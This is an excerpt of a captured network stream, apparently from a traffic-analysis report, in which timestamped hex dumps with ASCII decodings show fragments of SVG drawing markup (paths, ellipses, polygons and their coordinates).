                                                                                                                                                                              2023-09-15 05:27:27 UTC1508INData Raw: 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32 2e 30 36 2c 32 2e 30 36 2c 30 2c 30 2c 31 2c 2e 34 33 2d 2e 33 35 2c 32 2e 33 32 2c 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 35 33 2d 2e 32 34 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2c 2e 36 2d 2e 30 38 2c 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 31 2c 2e 31 39 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                              Data Ascii: .45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2.06,2.06,0,0,1,.43-.35,2.32,2.32,0,0,1,.53-.24,2.35,2.35,0,0,1,.6-.08,2.15,2.15,0,0,1,1,.19,2,2,0,0,1,.6
                                                                                                                                                                              2023-09-15 05:27:27 UTC1524INData Raw: 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22 20 72 78 3d 22 37 2e 32 31 22 20 72 79 3d 22 32 2e 34 35 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 70 6f 69 6e 74 73 3d 22 36 36 38 2e 31 35 20 33 33 31 2e 34 38 20 36 36 34 2e 37 33 20 33 32 39 2e 31 35 20 36 36 34 2e 39 33 20 33 31 37 2e 37 34 20 36 36 38 2e 34 20 33 31
                                                                                                                                                                              Data Ascii: y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34" rx="7.21" ry="2.45"/><polygon class="cls-38" points="668.15 331.48 664.73 329.15 664.93 317.74 668.4 31
                                                                                                                                                                              2023-09-15 05:27:27 UTC1540INData Raw: 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 31 2e 36 22 20 72 79 3d 22 32 2e 30 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28
                                                                                                                                                                              Data Ascii: 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="1.6" ry="2.05" transform="translate(45.69 569.88) rotate(
                                                                                                                                                                              2023-09-15 05:27:27 UTC1556INData Raw: 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34 32 2e 32 32 73 2d 2e 31 37 2d 2e 30 38 2d 2e 33 33 2d 2e 34 37 6c 2d 2e 31 36 2d 2e 33 37 61 2e 33 35 2e 33 35 2c 30 2c 30 2c 31 2c 30 2d 2e 31 34 63 30 2d 2e 32 34 2e 32 33 2d 2e 32 36 2e 33 36 2d 2e 32 35 53 38 31 36 2e 36 35 2c 32 35 30 2e 35 39 2c 38 31 36 2e 37 37 2c 32 35 30 2e 38 35 5a 6d 2e 34 35 2e 30
                                                                                                                                                                              Data Ascii: 34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.42.22s-.17-.08-.33-.47l-.16-.37a.35.35,0,0,1,0-.14c0-.24.23-.26.36-.25S816.65,250.59,816.77,250.85Zm.45.0
                                                                                                                                                                              2023-09-15 05:27:27 UTC1572INData Raw: 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 34 22 20 64 3d 22 4d 39 33 33 2e 37 32 2c 32 39 35 2e 38 33 61 33 31 2e 37 31 2c 33 31 2e 37 31 2c 30 2c 30 2c 31 2d 36 2e 32 2e 35 31 2c 33 32 2e 34 33 2c 33 32 2e 34 33 2c 30 2c 30 2c 31 2d 36 2e 32 34 2d 2e 35 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 35 22 20 64 3d 22 4d 39 33
                                                                                                                                                                              Data Ascii: ,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-114" d="M933.72,295.83a31.71,31.71,0,0,1-6.2.51,32.43,32.43,0,0,1-6.24-.51"/><path class="cls-115" d="M93
                                                                                                                                                                              2023-09-15 05:27:27 UTC1588INData Raw: 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22 20 64 3d 22 4d 38 39 36 2e 39 32 2c 32 34 36 2e 37 33 61 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 37 34 2d 2e 35 35 63 30 2d 2e 34 32 2e 32 37 2d 2e 37 39 2e 32 32 2d 31 2e 32 32 61 36 2e 34 38 2c 36 2e 34 38 2c 30 2c 30 2c 31 2c 32 2e 33 32 2d 2e 30 35 63 2d 2e 35 38 2e 39 34 2e 33 34 2c 32 2e 31 2c
                                                                                                                                                                              Data Ascii: 0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134" d="M896.92,246.73a2.36,2.36,0,0,1,.74-.55c0-.42.27-.79.22-1.22a6.48,6.48,0,0,1,2.32-.05c-.58.94.34,2.1,
                                                                                                                                                                              2023-09-15 05:27:27 UTC1604INData Raw: 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c 2e 31 33 2c 31 2e 32 34 2c 31 2e 31 39 2c 33 2e 32 36 2c 31 2c 34 2e 38 36 2c 31 2e 32 6c 32 2e 34 33 2e 32 34 63 2e 36 2e 30 36 2c 31 2e 31 37 2e 31 33 2c 31 2e 34 35 2d 2e 35 34 61 33 2e 38 37 2c 33 2e 38 37 2c 30 2c 30 2c 30 2c 2e 31 32 2d 31 2e 33 31 63 30 2d 31 2d 2e 31 36 2d 32 2d 2e 32 2d 33 43 38 32 37
                                                                                                                                                                              Data Ascii: 67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,.13,1.24,1.19,3.26,1,4.86,1.2l2.43.24c.6.06,1.17.13,1.45-.54a3.87,3.87,0,0,0,.12-1.31c0-1-.16-2-.2-3C827
                                                                                                                                                                              2023-09-15 05:27:27 UTC1620INData Raw: 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38 2d 38 2e 37 34 2d 36 2e 31 33 2d 31 32 2e 38 36 2d 37 2e 38 31 2d 31 2e 32 33 2d 35 2e 31 34 2d 31 2e 35 38 2d 39 2d 33 2e 39 35 2d 31 37 2e 34 38 2d 2e 30 36 2d 2e 32 32 2c 31 2e 32 32 2d 39 2c 31 2e 36 38 2d 39 2c 31 32 2e 30 39 2e 31 34 2c 32 31 2c 2e 35 36 2c 33 33 2c 2e 36 35 2c 32 33 2c 2e 31 38 2c 34 35
                                                                                                                                                                              Data Ascii: -3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08-8.74-6.13-12.86-7.81-1.23-5.14-1.58-9-3.95-17.48-.06-.22,1.22-9,1.68-9,12.09.14,21,.56,33,.65,23,.18,45
                                                                                                                                                                              2023-09-15 05:27:27 UTC1636INData Raw: 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 36 2e 38 36 20 35 36 33 2e 39 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 33 39 2e 30 38 22 20 63 79 3d 22 32 31 34 2e 30 35 22 20 72 78 3d 22 30 2e 31 35 22 20
                                                                                                                                                                              Data Ascii: ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="translate(46.86 563.99) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="839.08" cy="214.05" rx="0.15"
                                                                                                                                                                              2023-09-15 05:27:27 UTC1652INData Raw: 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 36 33 20 35 35 31 2e 31 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 33 2e 34
                                                                                                                                                                              Data Ascii: cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17" ry="0.22" transform="translate(28.63 551.15) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="813.4
                                                                                                                                                                              2023-09-15 05:27:27 UTC1668INData Raw: 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e 34 34 2e 32 2e 36 32 2e 33 31 2c 31 2c 2e 32 32 2e 37 34 2d 2e 31 37 2c 31 2e 37 35 2d 31 2e 30 37 2c 31 2e 34 35 2d 2e 36 39 2d 2e 32 33 2d 31 2e 31 2d 31 2d 31 2e 36 2d 31 2e 34 35 61 31 31 2e 37 36 2c 31 31 2e 37 36 2c 30 2c 30 2c 31 2d 31 2e 38 39 2d 31 2e 37 37 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c
                                                                                                                                                                              Data Ascii: s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.44.2.62.31,1,.22.74-.17,1.75-1.07,1.45-.69-.23-1.1-1-1.6-1.45a11.76,11.76,0,0,1-1.89-1.77,2.39,2.39,0,0,
                                                                                                                                                                              2023-09-15 05:27:27 UTC1684INData Raw: 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 33 35 2e 32 32 20 35 39 30 2e 35 20 32 33 39 2e 35 34 20 35 39 37 2e 38 31 20 32 33 36 2e 33 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 35 30 2e 33 31 20 35 39 30 2e 35 20 32
                                                                                                                                                                              Data Ascii: 5.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577.82 235.22 590.5 239.54 597.81 236.37"></polyline><polyline class="cls-53" points="577.82 250.31 590.5 2
                                                                                                                                                                              2023-09-15 05:27:27 UTC1700INData Raw: 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30 2c 32 2e 32 31 2e 35 34 2c 31 32 2e 31 31 2c 31 32 2e 31 31 2c 30 2c 30 2c 30 2c 32 2e 36 35 2e 36 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 30 2c 31 2e 34 35 2d 2e 35 35 63 2e 34 35 2d 2e 34 38 2e 32 38 2d 31 2e 35 37 2e 32 34 2d 32 2e 31 36 2d 2e 30 36 2d 31 2d 2e 34 33 2d 31 2e 39 32 2d 2e 34 31 2d 32 2e
                                                                                                                                                                              Data Ascii: anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0,2.21.54,12.11,12.11,0,0,0,2.65.6,2.52,2.52,0,0,0,1.45-.55c.45-.48.28-1.57.24-2.16-.06-1-.43-1.92-.41-2.
                                                                                                                                                                              2023-09-15 05:27:27 UTC1716INData Raw: 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 39 30 30 2e 31 35 2c 36 37 2e 38 38 61 2e 36 37 2e 36 37 2c 30 2c 30 2c 31 2d 2e 32 32 2e 35 32 2e 37 32 2e 37 32 2c 30 2c 30 2c 31 2d 2e 35 33 2e 32 2e 36 38 2e 36 38 2c 30 2c 30 2c 31 2d 2e 35 32 2d 2e 32 31 2e
                                                                                                                                                                              Data Ascii: 0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z"></path><path class="cls-2" d="M900.15,67.88a.67.67,0,0,1-.22.52.72.72,0,0,1-.53.2.68.68,0,0,1-.52-.21.
                                                                                                                                                                              2023-09-15 05:27:27 UTC1732INData Raw: 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                              Data Ascii: 51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M
                                                                                                                                                                              2023-09-15 05:27:27 UTC1748INData Raw: 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 33 34 2c 32 39 30 2e 39 31 61 31 2e 37
                                                                                                                                                                              Data Ascii: 0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.52-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M731.34,290.91a1.7
                                                                                                                                                                              2023-09-15 05:27:27 UTC1764INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 31 39 2c 31 39 33 2e 31 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d
                                                                                                                                                                              Data Ascii: th><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M749.19,193.12a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-
                                                                                                                                                                              2023-09-15 05:27:27 UTC1780INData Raw: 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 36 35 2c 32 38 39 2e 32 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32
                                                                                                                                                                              Data Ascii: ,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M780.65,289.24a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2
